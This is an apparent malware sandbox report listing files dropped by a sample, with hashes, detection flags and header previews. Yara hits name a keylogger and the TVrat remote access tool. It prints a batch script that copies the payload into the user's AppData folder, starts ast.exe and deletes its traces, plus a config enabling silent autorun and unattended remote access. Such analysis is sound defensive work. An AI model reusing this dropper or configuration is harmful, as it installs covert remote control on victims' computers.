                                                                                                                                          SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                          MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                          SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                          SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                          SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..k...k...k....%B.b....%@....%A.r...P..z...P..}...P..d...Fx.h...k...=...k...J......Y......j.....L.j...k.$.j......j...Richk...........PE..L...Q.xX...........!.........$.......P....................................... ............@.........................0....... ...(.......@........................8..0p..p............................p..@...............\............................text...9........................... ..`.rdata..............................@..@.data...(...........................@....gfids..d...........................@..@.rsrc...@...........................@..@.reloc...8.......:..................@..B................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\libssl-1_1.dll (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):541880
                                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L.....7a...........!.........................................................p............@..........................)...N........... ..s............ ...$...0...5......8...........................H...@............................................text............................... ..`.rdata...g.......h..................@..@.data....;.......6...`..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..`=...0...>..................@..B................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\msvcr120.dll (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):970912
                                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\opus.dll (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):370488
                                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\u7i3kw\quartz.dll (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1073767936
                                                                                                                                          Entropy (8bit):4.300012443222872E-4
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:
                                                                                                                                          MD5:C8AD6A4A50181E2DD95951BE4C2C54E1
                                                                                                                                          SHA1:8B7375158EE606D455295D0A34901BC05DEE0665
                                                                                                                                          SHA-256:DF6843408E914A00A2A4BF93068031E77023089E38031A3E5E99B0F420686ECA
                                                                                                                                          SHA-512:59CA02AD50E7D5FBD2DEE8295584AB643F8716ADE58352583A60EBA641012EA814D60247452D423CDB9FA05C5A79903184FFECFE615AE37DD2ACF8722E3E0952
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...@.a...........!...I.F...................`.......................................]....@..........................................p..L.......................d....................................................................................code...`E.......F.................. ..`.data........`.......J..............@....rsrc...L....p.......X..............@....edata...............^..............@..@.rdata...............`..............@..@.reloc..d............b..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\57mskh.cfg

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):33
                                                                                                                                          Entropy (8bit):4.9837880587523955
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:SqUEDm:Sqnm
                                                                                                                                          MD5:71B4245ABD801E82ECC8CB1571F8F52E
                                                                                                                                          SHA1:CD8ADA2E8089936C031937232E09E385FB402DDC
                                                                                                                                          SHA-256:4BE589771AC3BE4AE5B94590AFC39AEA664FBF400C651FBD268B48436FA509A7
                                                                                                                                          SHA-512:6897B6B819850489BF9732C46EDAFBDC8E439F3482E120A693D79FDBCB5F2E6947E7E2065D9A684F0A7CEF1B25E0938476D9F819F9F661A0D7AD2A7D0E8789D9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..8..DXP+...1.GBY.*..E.JQB......

                                                                                                                                          C:\Users\user\AppData\Roaming\template\9vsl3c.bat

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):465
                                                                                                                                          Entropy (8bit):4.684149132947556
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:hmR9oa39T4h+dspB929c2dceR0n1tcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvBN:w753d48daBVn17jfxmfJ8FQwH
                                                                                                                                          MD5:83B5833A435D05A04AC59744600DE4B7
                                                                                                                                          SHA1:ABE722BCC9DA288E76931962EF225EEB10BA1534
                                                                                                                                          SHA-256:B70F9730CC0796164698E9311AFBBDB95566149A7B542FE8E449F928DA239154
                                                                                                                                          SHA-512:FFA3A85AC112A622B5DC322CFF24197903B8D31D6ECAC265E02C92784693B3DFB76773545C5AB5C77FD64BF1482BEB9BC89D11392FADA662E09C0EF4099EAD8E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@echo off..set "StartDirName=template" ..set "TempDirName=u7i3kw" ..set "BatchName=9vsl3c.bat" ..set "ProcName=ast.exe" ....if exist "%appdata%\StartDirName" (..goto end..) else (..mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"..start "" "%appdata%\%StartDirName%\%ProcName%"..)..:end..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..

                                                                                                                                          C:\Users\user\AppData\Roaming\template\AstCrp.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):172216
                                                                                                                                          Entropy (8bit):6.698242571688099
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                                          MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                                          SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                                          SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                                          SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\ast.exe

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):7543992
                                                                                                                                          Entropy (8bit):6.717610928993395
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                                          MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                                          SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                                          SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                                          SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\astclient.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):581304
                                                                                                                                          Entropy (8bit):6.580382227041057
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                                          MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                                          SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                                          SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                                          SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\astrct.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1724088
                                                                                                                                          Entropy (8bit):6.573221633911959
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                                          MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                                          SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                                          SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                                          SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....5k.o....5i.....5h.h.......Y...w...:...........%...l...%.......%...R....VQ.d...w................v.....e.v...w...v.......v...Richw...........PE..L..._..`...........!.....@...B...............P......................................Q.....@.........................@Z..H....Z..........(............*...$... ..........p...........................P...@............P..|............................text....>.......@.................. ..`.rdata..(....P... ...D..............@..@.data........p...2...d..............@....rodata.@...........................@..@.rsrc...(...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\aw_sas32.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):17648
                                                                                                                                          Entropy (8bit):6.317642988990049
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                                          MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                                          SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                                          SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                                          SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\config.ini

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):586
                                                                                                                                          Entropy (8bit):5.203397968860563
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:L1YWzRcSbZKsNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:Z7zRcSbZKKlcMypJD5KxkiaJosBq
                                                                                                                                          MD5:5D7974984AE3D593B7887CC7BDA866DD
                                                                                                                                          SHA1:9C0B2EC2659812F1E46F2D32F82E61DF223C674C
                                                                                                                                          SHA-256:7888BDB632F1BC5EB6DAE5624FE9065868D279E50ACC569D3DDE0F6DB1C95051
                                                                                                                                          SHA-512:7BDACFBCE85726A683C3A316F578A88D5991E37C8FB1E13FC4715141F5752E7FD5D145AC36730B637E26FD3198EDE2D27E86F5CF7283A0C9B08579B1056B0B70
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[config]..Security.FixPass=4297F44B13955235245B2497399D7A93..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..

                                                                                                                                          C:\Users\user\AppData\Roaming\template\exn5epb.bmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x272, components 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):5802
                                                                                                                                          Entropy (8bit):7.930078612894882
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:WnjHA1+9wxNAwaf886RfeyZH+5sJCf9ZN2Lzr7wnJIbp8Gj7S2ZchDqDdZyt7JlK:yVMQM1TeSJCf9Kr7wnJIbGGjtA+KJlOH
                                                                                                                                          MD5:AD245BDEA321CE2B299310DE0B7140A3
                                                                                                                                          SHA1:B98EE537F4BAA319F74BEC31D00A8F0B9621854C
                                                                                                                                          SHA-256:D2A83207A65620B133BABAE9D8E4595EB5556F4FC063CF41A552D664E0865C4B
                                                                                                                                          SHA-512:1F4D9994397D10EF3879ED5F7C1F85129E2644E0C6B243E920ED5C4623082865911B1255A577BFFAF035EB6F3E41DE6E4CD7B7D354C64F097891B965C18CBD11
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......JFIF..................................................!.%..+!..&8&+/1555.$;@=3?.451...........4!!+14414444444644144444444444441414444444444444444444..........."........................................;.........................!.1A.."2QaqB..R..#br..3......S..............................#.....................!..1"AQ..2aq............?....1JK+.H.....zrQa..."..u.4`..........C........C..B($%........#..@E..V.(.a...&...FMh.L..X..W.....LQ.@L.V...A......V.Ee.(."..Lp$G...9....b/..>.m.'TI0..C..C....Q.6.V..DZX...D.S.y..^.5..#.-L...#.T.x.}4..?5..E...I.=.pV....OB.....0.....p.ux-.Y.....QQG._.R...G..|E............a..pG%......Q.6.......I..(.W._.9....A..U....U.{.Fzk.....tv.Q.:.:0.)....?..Z..q...^...~...2.."..G{@.5h.jk...Jl<...i...vS....&..W.....7......A........j......./....?i.*.-......v..p<7.nC./s.....T.qv..[.......>.e.W.....S..7..7.....,-n.q..R..*.......?.7Z..Yg.R...T.6~..ES..q......Yo.....:.....T8..R*..T..%D..U..Q....&^..Bq.qR.......B.T...[.5{.....1....X..;

                                                                                                                                          C:\Users\user\AppData\Roaming\template\hatls.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2236144
                                                                                                                                          Entropy (8bit):5.624149670958732
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                                          MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                                          SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                                          SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                                          SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.K....}.K..._.}.K.....}...~..}...y..}.......}...|.W.}...x...}...x...}...}...}......}.......}.......}.Rich..}.................PE..L..."..[...........!.........x.......................................................,"...@.........................P.,.^....s-.P.....-.0.............".......-.....`.+.8...................@.+.......+.@............p-..............................textbss.T...............................text.......p...................... ..`.rdata....... '.....................@..@.data....`....-..@.... .............@....idata.......p-....... .............@..@.msvcjmc......-....... .............@....tls..........-....... .............@....00cfg........-....... .............@..@.rsrc...0.....-....... .............@..@.reloc........-....... .............@..B................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\libcrypto-1_1.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2533560
                                                                                                                                          Entropy (8bit):6.236092740507617
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                                          MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                                          SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                                          SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                                          SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[J...+...+...+...S#..+..MC...+..MC...+..MC...+..MC...+..DC...+...+...+...+...+...B..j)...B...+...BO..+...B...+..Rich.+..........PE..L.....7a...........!.....T...p......;H.......p................................'.......&...@...........................#..h....%.T.....&.|.............&..$....&.L...0.".8...........................h.".@.............%..............................text...>S.......T.................. ..`.rdata.......p.......X..............@..@.data....Y...p%......X%.............@....idata..J.....%......n%.............@..@.00cfg........%.......%.............@..@.rsrc...|.....&.......%.............@..@.reloc........&.......%.............@..B........................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\libcryptoMD.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2098416
                                                                                                                                          Entropy (8bit):6.277915381502377
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                          MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                          SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                          SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                          SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+...x...x...x...x...x..,x...x...x...x...x...x(.8x...x...xT..x...x...x@s.x...x@s/x...x..(x...x@s-x...xRich...x................PE..L....<.Y...........!.....j...................................................` ....... ...@.............................1...c..x.................................. ...8............................w..@............`...............................text....i.......j.................. ..`.rdata..XA.......B...n..............@..@.data............Z..................@....idata..M....`......................@..@.rsrc...............................@..@.reloc..z............&..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\libcurl.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):546816
                                                                                                                                          Entropy (8bit):6.657309146326691
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                                          MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                                          SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                                          SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                                          SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                                          Malicious:true
